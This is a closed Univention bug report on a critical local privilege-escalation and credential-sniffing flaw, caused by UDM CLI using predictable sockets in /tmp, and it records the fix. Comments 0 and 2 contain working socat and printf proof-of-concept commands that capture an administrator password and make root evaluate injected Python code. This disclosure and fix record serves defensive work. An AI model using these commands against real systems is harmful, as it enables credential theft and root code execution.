Bug 40422

Summary:	local root code execution vulnerability as every user because UDM CLI uses sockets from /tmp/
Product:	UCS	Reporter:	Florian Best <best>
Component:	UDM - CLI	Assignee:	Florian Best <best>
Status:	CLOSED FIXED	QA Contact:	Philipp Hahn <hahn>
Severity:	critical
Priority:	P5	CC:	gohmann
Version:	UCS 4.1
Target Milestone:	UCS 4.1-2-errata
Hardware:	Other
OS:	Linux
See Also:	https://forge.univention.org/bugzilla/show_bug.cgi?id=20610 https://forge.univention.org/bugzilla/show_bug.cgi?id=33224
What kind of report is it?:	Security Issue	What type of bug is this?:	---
Who will be affected by this bug?:	---	How will those affected feel about the bug?:	---
User Pain:		Enterprise Customer affected?:
School Customer affected?:		ISV affected?:
Waiting Support:		Flags outvoted (downgraded) after PO Review:
Ticket number:		Bug group (optional):	Security
Max CVSS v3 score:

Description Florian Best

2016-01-13 11:21:57 CET

As the UDM-CLI tools connects to UNIX sockets in /tmp/ everybody is able to "play" CLI-Server.

For example the user "nobody" may create that unix socket and just needs to wait for the Administrator/or a joinscript/postinst/whatever to send requests to that socket. It allows a MITM attack e.g. to sniff the password.

nobody@master:~$ mkdir /tmp/admincli_0
nobody@master:~$ socat unix-listen:/tmp/admincli_0/sock stdout
['/usr/sbin/udm', 'users/user', 'modify', '--dn', 'uid=Administrator,cn=users,dc=saml,dc=dev', '--set', 'password=foo', '--binddn', 'uid=Administrator,cn=users,dc=saml,dc=dev', '--bindpw', 'univention']

As the password is anyway in the processlist this is not more critical than that a user has access to the system (e.g. due to Bug #39678 comment 7)

Comment 1 Florian Best

2016-01-13 11:23:18 CET

[DoS]: Therefore "nobody" is able to completely block every UDM-CLI call forever.

Comment 2 Florian Best

2016-06-23 18:38:10 CEST

And another thing is that code is executed which is send to the socket in both directions:

→ let user 'root' execute code (logged in a user nobody):
# su nobody
nobody:/$ mkdir /tmp/admincli_0
nobody:/$ printf "__import__('os').system('touch /tmp/evaled')\x00" | socat unix-listen:/tmp/admincli_0/sock stdin
nobody:/$ ls -l /tmp/evaled 
-rw-r--r-- 1 root root 0 Jun 23 18:35 /tmp/evaled

→ Execute code on the server (harmless, as the same user):
printf "__import__('os').system('touch /tmp/evaled')\x00" | socat stdin unix-connect:/tmp/admincli_65534/sock

Comment 3 Florian Best

2016-06-23 20:00:58 CEST

* Code is now evaluated with ast.literal_eval().
* Sockets are checked if the uid is the same as the current/calling UID.
→ Should we check also permissions here?
* If the connection fails it is retried with a socket name containing random values to prevent that someone makes UDM unusable for non-root users.

univention-directory-manager-modules (11.0.3-17):
r70594 | Bug #40422: fix local root code execution and MITM vulnerability

Comment 4 Philipp Hahn

2016-06-28 11:22:53 CEST

OK: r70594
OK: udm modules
OK: su -c '/usr/sbin/udm users/user' Administrator
OK: mkdir /tmp/admincli_2002;touch /tmp/admincli_200/socket{,.run};time su -c '/usr/sbin/udm users/user' Administrator # delayed ~30s

FYI: A user visible progress would be nice as those 30s massively delay the CLI usage ; bash-completion seems to be broken.

FIXED: univention-directory-manager-modules.yaml
 r70667 | Bug #40422 et al: UDM YAML
OK: errata-announce -V --only univention-directory-manager-modules.yaml

Comment 5 Florian Best

2016-06-28 11:29:46 CEST

(In reply to Philipp Hahn from comment #4)
> FYI: A user visible progress would be nice as those 30s massively delay the
> CLI usage ; bash-completion seems to be broken.
Yes, I saw this, too. I see no reason to wait 30 seconds. I'll add a note to Bug #33224.

Comment 6 Florian Best

2016-06-29 16:43:21 CEST

*** Bug 37604 has been marked as a duplicate of this bug. ***

Comment 7 Janek Walkenhorst

2016-07-07 14:31:29 CEST

<http://errata.software-univention.de/ucs/4.1/208.html>